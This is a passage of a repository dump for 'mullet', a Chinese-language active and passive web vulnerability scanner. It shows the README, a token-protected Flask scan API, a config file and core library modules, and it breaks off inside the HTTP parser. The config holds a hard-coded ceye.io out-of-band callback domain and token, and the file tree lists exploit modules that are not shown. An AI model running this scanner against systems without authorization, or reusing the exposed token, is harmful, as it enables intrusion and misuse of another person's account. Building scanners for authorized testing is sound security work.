├── .gitignore
├── README.md
├── api.py
├── config
├── config.ini
└── report_template.html
├── imgs
├── api.jpg
├── sqli.jpg
├── 主动扫描.jpg
├── 主动扫描1.jpg
├── 主动扫描2.jpg
├── 使用.jpg
├── 报告.jpg
└── 被动扫描.jpg
├── lib
├── cmd_parser.py
├── controller.py
├── data.py
├── filter.py
├── html_parser.py
├── http_parser.py
├── jscontext.py
├── log.py
├── proxy.py
├── rate.py
├── reverse.py
├── utils.py
└── work.py
├── main.py
├── plugins
├── fingerprint
│ ├── fingerprint.py
│ └── scripts
│ │ ├── base.py
│ │ └── framework
│ │ ├── django.py
│ │ ├── fp_flask.py
│ │ ├── shiro.py
│ │ ├── springboot.py
│ │ ├── struts2.py
│ │ └── thinkphp.py
├── general
│ ├── general.py
│ └── scripts
│ │ ├── js_sensitive.py
│ │ ├── jsonp.py
│ │ ├── sqli.py
│ │ ├── sqli
│ │ ├── boolean_blind.xml
│ │ ├── boundaries.xml
│ │ ├── error_based.xml
│ │ ├── errors.xml
│ │ └── time_blind.xml
│ │ └── xss.py
├── poc
│ ├── base.py
│ ├── poc_scan.py
│ └── pocs
│ │ ├── shiro
│ │ └── shiro_default_key.py
│ │ ├── spring
│ │ ├── CVE-2022-22947.py
│ │ └── spring_0daya.py
│ │ ├── struts2
│ │ ├── s2_057.py
│ │ ├── s2_059.py
│ │ └── s2_061.py
│ │ └── thinkphp
│ │ └── ThinkPHP5_5_0_22.py
├── report.py
├── scan.py
└── sensitive_info
│ ├── sensitive_info.py
│ └── sensitive_info.txt
└── requirements.txt
/.gitignore:
--------------------------------------------------------------------------------
1 | # Byte-compiled / optimized / DLL files
2 | __pycache__/
3 | *.py[cod]
4 | *$py.class
5 |
6 | # C extensions
7 | *.so
8 |
9 | # Distribution / packaging
10 | .Python
11 | build/
12 | develop-eggs/
13 | dist/
14 | downloads/
15 | eggs/
16 | .eggs/
17 | lib64/
18 | parts/
19 | sdist/
20 | var/
21 | wheels/
22 | pip-wheel-metadata/
23 | share/python-wheels/
24 | *.egg-info/
25 | .installed.cfg
26 | *.egg
27 | MANIFEST
28 |
29 | # PyInstaller
30 | # Usually these files are written by a python script from a template
31 | # before PyInstaller builds the exe, so as to inject date/other infos into it.
32 | *.manifest
33 | *.spec
34 |
35 | # Installer logs
36 | pip-log.txt
37 | pip-delete-this-directory.txt
38 |
39 | # Unit test / coverage reports
40 | htmlcov/
41 | .tox/
42 | .nox/
43 | .coverage
44 | .coverage.*
45 | .cache
46 | nosetests.xml
47 | coverage.xml
48 | *.cover
49 | *.py,cover
50 | .hypothesis/
51 | .pytest_cache/
52 |
53 | # Translations
54 | *.mo
55 | *.pot
56 |
57 | # Django stuff:
58 | *.log
59 | local_settings.py
60 | db.sqlite3
61 | db.sqlite3-journal
62 |
63 | # Flask stuff:
64 | instance/
65 | .webassets-cache
66 |
67 | # Scrapy stuff:
68 | .scrapy
69 |
70 | # Sphinx documentation
71 | docs/_build/
72 |
73 | # PyBuilder
74 | target/
75 |
76 | # Jupyter Notebook
77 | .ipynb_checkpoints
78 |
79 | # IPython
80 | profile_default/
81 | ipython_config.py
82 |
83 | # pyenv
84 | .python-version
85 |
86 | # pipenv
87 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
88 | # However, in case of collaboration, if having platform-specific dependencies or dependencies
89 | # having no cross-platform support, pipenv may install dependencies that don't work, or not
90 | # install all needed dependencies.
91 | #Pipfile.lock
92 |
93 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow
94 | __pypackages__/
95 |
96 | # Celery stuff
97 | celerybeat-schedule
98 | celerybeat.pid
99 |
100 | # SageMath parsed files
101 | *.sage.py
102 |
103 | # Environments
104 | .env
105 | .venv
106 | env/
107 | venv/
108 | ENV/
109 | env.bak/
110 | venv.bak/
111 |
112 | # Spyder project settings
113 | .spyderproject
114 | .spyproject
115 |
116 | # Rope project settings
117 | .ropeproject
118 |
119 | # mkdocs documentation
120 | /site
121 |
122 | # mypy
123 | .mypy_cache/
124 | .dmypy.json
125 | dmypy.json
126 |
127 | # Pyre type checker
128 | .pyre/
129 | log/
130 | /venv
131 |
132 | *.db
133 | output
134 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
6 | # mullet
7 | 扫描器 梭鱼
8 | 支持主动 被动扫描的方式
9 |
10 | 被动通过 mitm 支持 所以需要安装证书
11 | `安装证书 代理开启后访问 http://mitm.it/`
12 |
13 | poc是跟指纹关联的 指纹匹配了才会发对应的poc
14 |
15 | 采用统一请求的方式 限流 所有发的请求都会被限流
16 | 内部多个插件使用多生产多消费的模式
17 |
18 |
19 | ## 安装
20 |
21 | 仅支持python3的环境
22 |
23 | ```shell
24 | git clone git@github.com:Ciyfly/mullet.git
25 | cd mullet
26 | python3 -m venv venv
27 | source venv/bin/activate
28 | pip install --upgrade pip
29 | pip install -r requirements.txt
30 | python main.py --help
31 | ```
32 |
33 | ## 使用
34 |
35 | 
36 |
37 | ### 主动扫描
38 | `python main.py -u "http://192.168.19.144:8080/level1.php?name=asdasdasd"`
39 |
40 | 
41 | 
42 |
43 |
44 |
45 | ### 被动扫描
46 |
47 | 默认监听`8686` 端口
48 | `python main.py`
49 |
50 | 
51 |
52 | ## 报告
53 | 输出报告是html格式的在 output目录下
54 |
55 | 
56 |
57 | ## api
58 | 支持 web 的api形式 创建扫描 默认监听`8787`端口
59 | api 会先随机生成token api需要携带token参数才能创建任务
60 |
61 | server `python api.py`
62 | client
63 | ```shell
64 | curl -X POST \
65 | http://192.168.19.144:8787/scan/ \
66 | -H 'content-type: application/json' \
67 | -d '{
68 | "url":"http://192.168.19.144:8080/level1.php?name=asdasdasd",
69 | "token": "ncsgaqvuliehomfk"
70 | }'
71 | ```
72 |
73 | 
74 |
75 |
76 | ## 检测
77 | 通用检测
78 |
79 | - sqli
80 | - xss
81 | - jsonp
82 |
83 | 指纹
84 |
85 | 指纹采用的是单个脚本的形式 有一些特殊情况靠配置文件或者json不好处理
86 |
87 | - shiro
88 | - struts2
89 | - thinkphp
90 |
91 | poc
92 |
93 | - shiro_default_key
94 | - spring CVE-2022-22947
95 | - s2_061
96 | - s2_059
97 | - s2_057
98 | - ThinkPHP5_5_0_22
99 |
100 |
101 | ## 配置文件
102 | 配置文件在 config/config.ini
103 | ```ini
104 | [options]
105 | ; model=debug
106 | model=info
107 | [reverse]
108 | ceye_domain=y9be3e.ceye.io
109 | ceye_token=e3764fbde6dad1a2a8fd85be90ba42c9
110 |
111 | ; 插件的开关控制
112 | [switch]
113 | fingerprint=False
114 | sensitive_info=False
115 | general=True
116 | poc=False
117 | ; 通用插件的开关
118 | [switch_general]
119 | ; list=jsfind,jsonp,sqli,xss,js_sensitive
120 | list=xss
121 |
122 | # 速率限制
123 | [rate]
124 | max_calls=10
125 | period=1
126 | # 网络请求的默认超时时间
127 | timeout=3
128 |
129 | # 白名单
130 | [white_list]
131 | list=google.com,gov.cn,googleapis.com,github.com
132 | ```
133 | ## 参考
134 | https://github.com/w-digital-scanner/w13scan/
135 | https://github.com/sqlmapproject/sqlmap
136 | https://mp.weixin.qq.com/s?__biz=MzU2NzcwNTY3Mg==&mid=2247483698&idx=1&sn=9733c6078516c34963a4c0486c6d1872&chksm=fc986815cbefe103975c2e554ef2667b931e14b2d1dcca407af9edbad83ea72f3ac88efd8d22&mpshare=1&scene=1&srcid=&sharer_sharetime=1588849508551&sharer_shareid=19604935512cdb60a84a4a498605fc8d&key=e4739a048b456af8bbf436c6fb2173754f53fcd63e766a439186e0a2433cd084a69e23876cc446623cb005c3c9fed06af918b7b082f604e7a23c136961d5a1e633f4a60b65b241dea730f7c13578ea94&ascene=1&uin=MTM3MzQ3ODE0MA%3D%3D&devicetype=Windows+10&version=62080079&lang=zh_CN&exportkey=AZ%2F8pd18PHTzKD6ytyi7PPk%3D&pass_ticket=ssxjxDrN0aRCdy2TGXV37%2Bg0cYgtEknB95Y1dXjxGOtpxjCYC6wfPOq5QXvs3lzE
137 |
138 | ## 声明
139 | 使用mullet前请遵守当地法律,mullet仅提供给教育行为使用。
140 |
--------------------------------------------------------------------------------
/api.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # coding=utf-8
3 | '''
4 | Date: 2022-03-31 16:17:16
5 | LastEditors: recar
6 | LastEditTime: 2022-03-31 17:16:02
7 | '''
8 |
9 | from flask import Flask, request, jsonify
10 | from lib.data import controller
11 | from lib.http_parser import HTTPParser
12 | from lib.utils import Utils
13 | from lib.log import logger
14 |
# One Flask app per process. TOKEN is regenerated at every start and must be
# echoed back in each /scan/ request body (printed once at startup).
app = Flask('mullet')
TOKEN = Utils.gen_random_str(16)

# block=True: long-running (passive/proxy style) controller mode
controller.init(block=True)
19 |
@app.route('/scan/', methods=['POST'])
def scan():
    """Create a scan task for a submitted URL.

    Expects a JSON body ``{"url": ..., "token": ...}``. The token must match
    the per-process random TOKEN. Responds with code 200 on success, 201 on
    an invalid token (unchanged contract), 400 on bad input or an
    unreachable target (previously these cases crashed the view).
    """
    import hmac  # stdlib; local import keeps the module header untouched
    # silent=True: malformed / missing JSON yields None instead of a 400 abort
    data = request.get_json(silent=True)
    if not data:
        return jsonify({
            "code": 400,
            "message": "Invalid JSON body"
        })
    url = data.get("url")
    data_token = data.get("token")
    # compare_digest avoids leaking the token via comparison timing
    if data_token is None or not hmac.compare_digest(str(data_token), TOKEN):
        return jsonify({
            "code": 201,
            "message": "Invalid token"
        })
    if not url:
        return jsonify({
            "code": 400,
            "message": "Missing url"
        })
    rsp, req = HTTPParser.get_res_req_by_url(url)
    # get_res_req_by_url returns (None, None) when the target is unreachable;
    # the original then crashed inside req_to_urlinfo(None)
    if req is None:
        return jsonify({
            "code": 400,
            "message": "Target is not reachable"
        })
    url_info = HTTPParser.req_to_urlinfo(req)
    controller.run(url_info, req, rsp)
    return jsonify({
        "code": 200,
        "message": "Add success"
    })
37 |
if __name__ == '__main__':
    # Print the token once at startup; API clients must send it back.
    logger.info("TOKEN: {0}".format(TOKEN))
    logger.info("Mullet api ")
    app.run(host='0.0.0.0', port=8787)
42 |
--------------------------------------------------------------------------------
/config/config.ini:
--------------------------------------------------------------------------------
1 | [options]
2 | ; model=debug
3 | model=info
4 | [reverse]
5 | ceye_domain=y9be3e.ceye.io
6 | ceye_token=e3764fbde6dad1a2a8fd85be90ba42c9
7 |
8 | ; 插件的开关控制
9 | [switch]
10 | ; fingerprint=True
11 | fingerprint=True
12 | sensitive_info=True
13 | general=True
14 | poc=True
15 | ; 通用插件的开关
16 | [switch_general]
17 | list=jsfind,jsonp,sqli,xss,js_sensitive
18 | ; list=xss
19 |
20 | # 速率限制
21 | [rate]
22 | max_calls=10
23 | period=1
24 | timeout=3
25 |
26 | # 白名单
27 | [white_list]
28 | list=google.com,gov.cn,googleapis.com,github.com
--------------------------------------------------------------------------------
/config/report_template.html:
--------------------------------------------------------------------------------
1 |
6 |
7 |
8 |
9 | Mullet Report
10 |
11 |
49 |
50 |
51 |
54 |
55 |
56 |
57 |
58 | plugins |
59 | payload |
60 | url |
61 | desc |
62 | req |
63 | rsp |
64 |
65 |
66 |
67 | {% for item in items %}
68 |
69 | {{item.plugins}} |
70 | {{item.payload}} |
71 | {{item.url}} |
72 | {{item.desc}} |
73 | {{item.req}} |
74 | {{item.rsp}} |
75 |
76 | {% endfor %}
77 |
78 |
79 |
80 |
--------------------------------------------------------------------------------
/imgs/api.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ciyfly/mullet/f03ed84bb24447e88497a845b3a429621fa65670/imgs/api.jpg
--------------------------------------------------------------------------------
/imgs/sqli.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ciyfly/mullet/f03ed84bb24447e88497a845b3a429621fa65670/imgs/sqli.jpg
--------------------------------------------------------------------------------
/imgs/主动扫描.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ciyfly/mullet/f03ed84bb24447e88497a845b3a429621fa65670/imgs/主动扫描.jpg
--------------------------------------------------------------------------------
/imgs/主动扫描1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ciyfly/mullet/f03ed84bb24447e88497a845b3a429621fa65670/imgs/主动扫描1.jpg
--------------------------------------------------------------------------------
/imgs/主动扫描2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ciyfly/mullet/f03ed84bb24447e88497a845b3a429621fa65670/imgs/主动扫描2.jpg
--------------------------------------------------------------------------------
/imgs/使用.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ciyfly/mullet/f03ed84bb24447e88497a845b3a429621fa65670/imgs/使用.jpg
--------------------------------------------------------------------------------
/imgs/报告.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ciyfly/mullet/f03ed84bb24447e88497a845b3a429621fa65670/imgs/报告.jpg
--------------------------------------------------------------------------------
/imgs/被动扫描.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ciyfly/mullet/f03ed84bb24447e88497a845b3a429621fa65670/imgs/被动扫描.jpg
--------------------------------------------------------------------------------
/lib/cmd_parser.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # coding=utf-8
3 | '''
4 | Date: 2022-01-12 16:28:33
5 | LastEditors: recar
6 | LastEditTime: 2022-04-07 11:34:53
7 | '''
8 | from cmath import log
9 | from lib.data import controller
10 | from lib.http_parser import HTTPParser
11 | from lib.proxy import proxy_run
12 | from lib.log import logger
13 | import logging
14 | import click
15 | import os
16 |
@click.command()
@click.option('-s', 'server_addr', type=str, default="0.0.0.0:8686", help='listen server addr default 0.0.0.0:8686')
@click.option('-v', '--violent', is_flag=True, help="violent test")
@click.option('-u', '--url', type=str, help="Do it directly without using proxy mode")
@click.option('-f', '--url_file', type=str, help="scan target file")
@click.option('-p', '--poc', type=str, help="run poc")
@click.option('--debug/--no-debug', help="log level set debug default False")
def cli(server_addr, violent, url, url_file, poc, debug):
    """Entry point: active scan (-u / -f), single poc run (-p),
    or passive proxy mode (default)."""
    # set log level
    if debug:
        logger.setLevel(logging.DEBUG)
    # violent: aggressive testing mode, forwarded to the controller
    if violent:
        logger.info("开启强力测试模式")
    urls = []
    if url or url_file:
        # active mode: push tasks and wait for queues to drain (block=False)
        controller.init(block=False, violent=violent)
        if url_file:
            if not os.path.exists(url_file):
                click.echo("url_file is not exists")
                # bug fix: click.exit() does not exist (AttributeError)
                raise SystemExit(1)
            with open(url_file, 'r') as f:
                # skip blank lines so they do not become empty scan targets
                urls = [line.strip() for line in f if line.strip()]
        if url:
            urls.append(url)
        if poc:
            # run a single named poc against every target
            logger.info("Run Poc: {0}".format(poc))
            for target in urls:
                rsp, req = HTTPParser.get_res_req_by_url(target)
                if rsp is None:
                    logger.error("{0} :不能访问".format(target))
                    continue
                url_info = HTTPParser.req_to_urlinfo(req)
                controller.run_poc(url_info, req, rsp, poc)
        elif urls:
            # full scan of every target
            logger.info("mode: Scan")
            for target in urls:
                rsp, req = HTTPParser.get_res_req_by_url(target)
                if rsp is None:
                    logger.error("{0} :不能访问".format(target))
                    continue
                url_info = HTTPParser.req_to_urlinfo(req)
                controller.run(url_info, req, rsp)
            logger.info("end")
    else:
        # passive mode: mitm proxy listening on server_addr
        logger.info("mode: Proxy")
        controller.init(violent=violent)
        addr, port = server_addr.split(":")
        proxy_run(addr, int(port))
74 |
75 |
--------------------------------------------------------------------------------
/lib/controller.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # coding=utf-8
3 | '''
4 | Date: 2022-01-12 11:05:17
5 | LastEditors: recar
6 | LastEditTime: 2022-04-07 16:27:25
7 | '''
8 | from lib.work import Worker
9 | from plugins.report import Report
10 | from plugins.fingerprint.fingerprint import Fingerprint
11 | from plugins.sensitive_info.sensitive_info import SensitiveInfo
12 | from plugins.general.general import General
13 | from plugins.poc.poc_scan import PocScan
14 | from lib.log import logger
15 | import configparser
16 | import time
17 | import sys
18 | import os
19 |
20 |
21 |
class Controller(object):
    """Central dispatcher: loads config/config.ini, instantiates the enabled
    plugin handlers and routes every request/response pair to them."""

    def __init__(self,):
        # de-duplication caches: hosts already fingerprinted and
        # generalized urls already pushed to the general plugins
        self.domains = dict()
        self.urls = dict()
        self.logger = logger
        self.base_path = os.path.dirname(os.path.abspath(__file__))
        self.plugins_dir = os.path.join(self.base_path, "../", 'plugins')
        self.general_plugins_dir = os.path.join(self.plugins_dir, "general")
        self.pocs_dir = os.path.join(self.plugins_dir, "poc", "pocs")

        # register plugin directories on sys.path so plugin scripts can be
        # imported by bare module name
        sys.path.append(self.general_plugins_dir)
        sys.path.append(self.pocs_dir)
        # load config
        self.load_config()

    def load_config(self):
        """Read plugin switches, the enabled general-plugin list and the
        domain white list from config/config.ini."""
        config_path = os.path.join(self.base_path, "../", "config", "config.ini")
        conf = configparser.ConfigParser()
        conf.read(config_path)
        self.switch_fingerprint = conf.getboolean('switch', 'fingerprint')
        self.switch_sensitive_info = conf.getboolean('switch', 'sensitive_info')
        self.switch_general = conf.getboolean('switch', 'general')
        self.switch_poc = conf.getboolean('switch', 'poc')
        # names of the general plugins that are switched on
        self.switch_general_list = conf.get('switch_general', 'list').split(",")
        # domains that must never be scanned
        self.white_list = conf.get('white_list', 'list').split(",")

    def init(self, block=True, violent=False):
        """Create the report worker and the enabled plugin handlers.

        block=True  -> passive proxy mode; block=False -> active scan mode
        (run() then waits for the worker queues to drain).
        violent     -> aggressive-testing flag forwarded to general plugins.
        """
        self.logger.debug("Controller Init ")
        # start the report module
        self.report = Report()
        # True: passive proxy; False: active scan
        self.block = block
        # aggressive ("violent") testing mode flag
        self.violent=violent
        # report worker shared by all plugin handlers
        self.report_work = self.report.report_work
        # fingerprint
        if self.switch_fingerprint:
            self.fingerprint_handler = Fingerprint(self.report_work, block=self.block)
        # sensitive information
        if self.switch_sensitive_info:
            self.sensitiveInfo_handler = SensitiveInfo(self.report_work, block=self.block)
        # general detection plugins
        # if self.block:
        if self.switch_general:
            self.general_plugins_handler = General(self.report_work, block=self.block)
        # poc module
        if self.switch_poc:
            self.poc_handler = PocScan(self.report_work, block=self.block)


    def print_task_queue(self):
        # NOTE(review): self.task_queue_map is never assigned in this class,
        # so calling this would raise AttributeError — confirm against the
        # rest of the project before relying on it.
        while True:
            task_info = ""
            for plugins, queue in self.task_queue_map.items():
                task_info +="|{0}:{1}|".format(plugins, queue.qsize())
            sys.stdout.write("\r{0}".format(task_info))
            sys.stdout.flush()
            time.sleep(0.5)

    # entry point: dispatch one request/response pair to the plugins
    def run(self, url_info, req, rsp):
        # skip white-listed domains entirely
        for domain in self.white_list:
            if domain in url_info.get('origin_url'):
                return
        domain = url_info.get('host')
        gener_url = url_info.get("gener_url")
        self.logger.debug("block: {0}".format(self.block))
        # per-host plugins run only on first sight of the host
        if domain not in self.domains:
            self.logger.debug("Domain: {0}".format(domain))
            self.domains[domain]=""
            # push to fingerprint
            if self.switch_fingerprint:
                self.logger.debug("fingerprint")
                self.fingerprint_handler.run(url_info, req, rsp)
            # push to sensitive-info scan
            if self.switch_sensitive_info:
                self.logger.debug("sensitiveInfo")
                self.sensitiveInfo_handler.run(url_info, req, rsp)
        # general plugins run once per generalized url
        # if self.block and gener_url not in self.urls:
        if gener_url not in self.urls:
            self.logger.debug("general")
            self.urls[gener_url]=""
            # push to the general plugins
            if self.switch_general:
                self.logger.debug("switch_general")
                self.general_plugins_handler.run(url_info, req, rsp, self.switch_general_list, violent=self.violent)
        # active scan mode: wait until every worker queue drains
        if not self.block:
            if self.switch_fingerprint:
                while not self.fingerprint_handler.fingerprint_work.is_end():
                    time.sleep(3)
            if self.switch_sensitive_info:
                while not self.sensitiveInfo_handler.seninfo_work.is_end():
                    time.sleep(3)
            if self.switch_general:
                while not self.general_plugins_handler.general_work.is_end():
                    time.sleep(3)
            # fire pocs for every fingerprint hit collected so far
            if self.switch_poc:
                for result_info in self.report.result_list:
                    plugins = result_info.plugins
                    if plugins == "fingerprint":
                        payload = result_info.payload
                        self.logger.debug("fingerprint: {0} ->poc".format(payload))
                        self.poc_handler.run(url_info, req, rsp, payload)
        # wait for the poc worker (if it was created) to finish
        if self.switch_poc and self.switch_fingerprint:
            if hasattr(self.poc_handler, "poc_work"):
                while not self.poc_handler.poc_work.is_end():
                    time.sleep(3)
        return

    def run_poc(self, url_info, req, rsp, poc_name):
        """Run a single named poc against the target (cli -p option)."""
        self.poc_handler.run_poc_by_name(url_info, req, rsp, poc_name)
        self.logger.info("poc run over")
142 |
--------------------------------------------------------------------------------
/lib/data.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # coding=utf-8
3 | '''
4 | Date: 2022-01-14 15:23:56
5 | LastEditors: recar
6 | LastEditTime: 2022-03-21 15:53:47
7 | '''
# Process-wide singleton: every module imports this one Controller instance
# so configuration and de-duplication state are shared.
from lib.controller import Controller
controller = Controller()
10 |
--------------------------------------------------------------------------------
/lib/filter.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # coding=utf-8
3 | '''
4 | Date: 2021-03-23 15:51:56
5 | LastEditors: recar
6 | LastEditTime: 2022-03-29 14:40:57
7 | '''
8 | from lib.http_parser import HTTPParser
9 | from lib.data import controller
10 | from lib.log import logger
11 | import sys
12 | sys.path.append('../')
13 |
class Filter(object):
    """mitmproxy hooks: normalize intercepted flows and dispatch them."""

    @staticmethod
    def parser_request(flow):
        # Strip Accept-Encoding from the outgoing request — presumably so the
        # upstream replies uncompressed and bodies can be inspected as text.
        del flow.request.headers['Accept-Encoding']

    @staticmethod
    def parser_response(flow):
        """Convert a completed flow into url_info/req/rsp dicts and hand
        them to the controller."""
        url_info = HTTPParser.flow_to_urlinfo(flow)
        req = HTTPParser.flow_to_req(flow)
        rsp = HTTPParser.flow_to_rsp(flow)
        # check: flow_to_urlinfo returns an empty (falsy) dict for static
        # resources, which are skipped here
        if not url_info:
            return
        logger.debug("[*] url: {0} type: {1}".format(url_info["url"], url_info['type']))
        # white-list filtering happens inside controller.run
        # insert url
        controller.run(url_info, req, rsp)
31 |
32 |
33 |
34 |
--------------------------------------------------------------------------------
/lib/html_parser.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | # -*- coding: utf-8 -*-
3 | # @Time : 2020/4/8 10:07 AM
4 | # @Author : w8ay
5 | # @File : htmlparser.py
6 | import random
7 | from abc import ABC
8 |
9 | from html.parser import HTMLParser
10 |
11 | import pyjsparser
12 |
13 | from lib.jscontext import analyse_js
14 |
15 |
def random_upper(text: str) -> str:
    '''
    Randomly flip roughly half of the characters of *text* to upper case.

    Each round upper-cases one randomly chosen character that is not already
    upper case. If no such character remains, the function stops early —
    the original rejection-sampling loop (`while text[rand].isupper()`)
    spun forever on all-uppercase input such as "AB".

    :param text: input string (may be empty)
    :return: the partially upper-cased string
    '''
    length = len(text)
    for _ in range(length // 2):
        # positions still eligible for flipping
        candidates = [i for i, ch in enumerate(text) if not ch.isupper()]
        if not candidates:  # nothing left to flip -> avoid infinite loop
            break
        pos = random.choice(candidates)
        text = text[:pos] + text[pos].upper() + text[pos + 1:]
    return text
30 |
31 |
class MyHTMLParser(HTMLParser, ABC):
    """Tokenizing HTML parser.

    Collects every element as a dict with ``tagname``, accumulated text
    ``content`` and ``attibutes`` (key spelling kept for compatibility with
    callers). Tokens are appended in tag-closing order; comments become
    ``#comment`` tokens.
    """

    def __init__(self):
        super().__init__()
        self.tree = []       # stack of currently open tags
        self.tokenizer = []  # finished tokens, in closing order
        self.root = None     # first tag ever opened
        # (removed an unused local ``temp`` dict from the original — it was
        # built and immediately discarded)

    def handle_starttag(self, tag, attrs):
        if len(self.tree) == 0:
            self.root = tag
        self.tree.append(
            {
                "tagname": tag,
                "content": "",
                "attibutes": attrs
            }
        )

    def handle_endtag(self, tag):
        # Pop the innermost open tag; HTML may be malformed, so no attempt
        # is made to match the closing tag name.
        if len(self.tree) > 0:
            self.tokenizer.append(self.tree.pop())

    def handle_startendtag(self, tag, attrs):
        # self-closing tag: open and close in one step
        self.handle_starttag(tag, attrs)
        self.handle_endtag(tag)

    def handle_data(self, data):
        # text accrues on the innermost open tag
        if self.tree:
            self.tree[-1]["content"] += data

    def handle_comment(self, data):
        self.tokenizer.append({
            "tagname": "#comment",
            "content": data,
            "attibutes": []
        })

    def getTokenizer(self):
        """Flush any still-open tags and return all collected tokens."""
        while len(self.tree):
            self.tokenizer.append(self.tree.pop())
        return self.tokenizer
80 |
81 |
def getParamsFromHtml(html):
    """Extract candidate parameter names from an HTML document.

    Collects the ``name`` attribute of every <input> tag plus identifiers
    found by analysing inline <script> blocks with pyjsparser/analyse_js.

    :param html: raw HTML text
    :return: de-duplicated list of parameter names
    """
    parse = MyHTMLParser()
    parse.feed(html)
    tokens = parse.getTokenizer()
    result = set()
    for token in tokens:
        tagname = token["tagname"].lower()
        if tagname == "input":
            for key, value in token["attibutes"]:
                if key == "name":
                    result.add(value)
                    break
        elif tagname == "script":
            try:
                nodes = pyjsparser.parse(token["content"]).get("body", [])
            except pyjsparser.pyjsparserdata.JsSyntaxError:
                # Bug fix: the original did ``return []`` here, so one
                # unparsable script discarded every name already collected.
                # Skip just the broken script instead.
                continue
            result |= set(analyse_js(nodes))
    return list(result)
103 |
104 |
def SearchInputInResponse(input, body):
    """Find every reflection of *input* in *body* and classify its context.

    Each occurrence is reported as a dict with ``type`` (one of ``intag``,
    ``comment``, ``script``, ``html``, ``attibute``), ``position`` (an index
    that advances once per token that contained at least one hit) and
    ``details`` (the matched token).

    NOTE(review): the parameter name ``input`` shadows the builtin, but it is
    part of the public signature and is kept.
    """
    parse = MyHTMLParser()
    parse.feed(body)
    tokens = parse.getTokenizer()
    index = 0
    occurences = []
    for token in tokens:
        tagname = token["tagname"]
        content = token["content"]
        attibutes = token["attibutes"]
        _input = input
        origin_length = len(occurences)

        if _input in tagname:
            occurences.append({
                "type": "intag",
                "position": index,
                "details": token,
            })
        elif input in content:
            if tagname == "#comment":
                occurences.append({
                    "type": "comment",
                    "position": index,
                    "details": token,
                })
            elif tagname == "script":
                occurences.append({
                    "type": "script",
                    "position": index,
                    "details": token,
                })
            elif tagname == "style":
                occurences.append({
                    "type": "html",
                    "position": index,
                    "details": token,
                })
            else:
                occurences.append({
                    "type": "html",
                    "position": index,
                    "details": token,
                })
        else:
            # determine whether the hit is in an attribute name or value;
            # ``content`` is reused here to hold "key"/"value"
            for k, v in attibutes:
                content = None
                if _input in k:
                    content = "key"
                elif v and _input in v:
                    content = "value"

                if content:
                    occurences.append({
                        "type": "attibute",
                        "position": index,
                        "details": {"tagname": tagname, "content": content, "attibutes": [(k, v)]},
                    })
        # advance the position counter only if this token produced hits
        if len(occurences) > origin_length:
            index += 1
    return occurences
167 |
--------------------------------------------------------------------------------
/lib/http_parser.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # coding=utf-8
3 | '''
4 | Date: 2022-01-14 11:29:39
5 | LastEditors: recar
6 | LastEditTime: 2022-04-07 11:40:59
7 | '''
8 | from urllib.parse import unquote
9 | from urllib.parse import urlparse, parse_qs
10 | from lib.utils import Utils
11 | from lib.log import logger
12 | import traceback
13 | import requests
14 |
# Map the integer HTTP version exposed by the underlying raw response
# (e.g. response.raw.version in requests/urllib3) to its protocol string.
http_version_map = {
    10: "HTTP/1.0",
    11: "HTTP/1.1"
}
19 |
class HTTPParser(object):
    """Converters between mitmproxy flows / ``requests`` objects and the
    plain dict structures (url_info, req, rsp) used across the scanner."""

    # Static-resource suffixes that are not worth scanning.
    # Bug fix: the original inline list had a missing comma, so the adjacent
    # literals "bmp" "svg" silently concatenated into the single useless
    # entry "bmpsvg" and .bmp urls slipped through the filter; "eot" was
    # also listed twice.
    STATIC_SUFFIXES = (
        "png", "css", "jpg", "svg", "ttf", "eot", "woff2", "gif",
        "bmp", "less", "sass", "scss", "ico", "woff", "md",
    )

    @staticmethod
    def flow_to_urlinfo(flow):
        """Build a url_info dict from a mitmproxy flow (passive mode).

        Returns an EMPTY dict for static resources — callers (lib/filter.py)
        rely on the falsy value to skip them.
        """
        url_info = dict()
        url = unquote(flow.request.url, 'utf-8')
        url_suffix = Utils.get_url_suffix(url)
        if url_suffix not in HTTPParser.STATIC_SUFFIXES:
            if url_suffix == "js":
                url_info["type"] = "js"
            elif url_suffix in ("jsp", "php", "asp", "aspx"):
                url_info["type"] = url_suffix
            else:
                url_info["type"] = "dynamic"
            url_info["gener_url"] = Utils.generalization(url)
            url_info["url"] = url
            url_info["origin_url"] = url
            # url parse
            parse_url = urlparse(url)
            url_info["path"] = parse_url.path
            url_info["params"] = parse_url.params
            url_info["query"] = parse_url.query
            url_info["method"] = flow.request.method
            url_info["data"] = flow.request.text
            url_info["headers"] = flow.request.headers
            # json flag: exact Content-Type match, as in the original
            url_info["json"] = flow.request.headers.get("Content-Type") == "application/json"
            if url_info["method"] == "GET":
                url_info["query_dict"] = parse_qs(parse_url.query)
            elif url_info["method"] == "POST":
                url_info["query_dict"] = parse_qs(url_info["data"])
            url_info["host"] = flow.request.host
            url_info["server_port"] = flow.server_conn.ip_address[1]
            url_info["server_ip"] = flow.server_conn.ip_address[0]
            url_info["ssl"] = "https" in url
            scheme = "https" if url_info["ssl"] else "http"
            url_info["base_url"] = "{0}://{1}:{2}".format(
                scheme, url_info["server_ip"], url_info["server_port"])
        return url_info

    @staticmethod
    def req_to_urlinfo(req):
        """Build a url_info dict from a req dict (active mode; always GET).

        ``type`` / ``gener_url`` are only set for non-static resources.
        """
        url_info = dict()
        url = unquote(req.get('url'), 'utf-8')
        url_info["origin_url"] = url
        url_info["method"] = 'GET'
        url_info["url"] = url
        parse_url = urlparse(url)
        url_info["path"] = parse_url.path
